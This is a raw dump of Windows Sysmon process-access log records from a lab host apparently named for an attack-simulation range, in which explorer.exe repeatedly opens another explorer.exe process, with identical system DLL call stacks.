16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241226Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241225Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241224Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241223Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241222Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241221Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241220Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241219Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241218Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241217Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241216Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241215Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241214Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241213Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241212Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241211Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241210Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241209Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241208Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241207Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241206Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241205Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241204Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241203Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241202Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241201Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241200Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.639{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 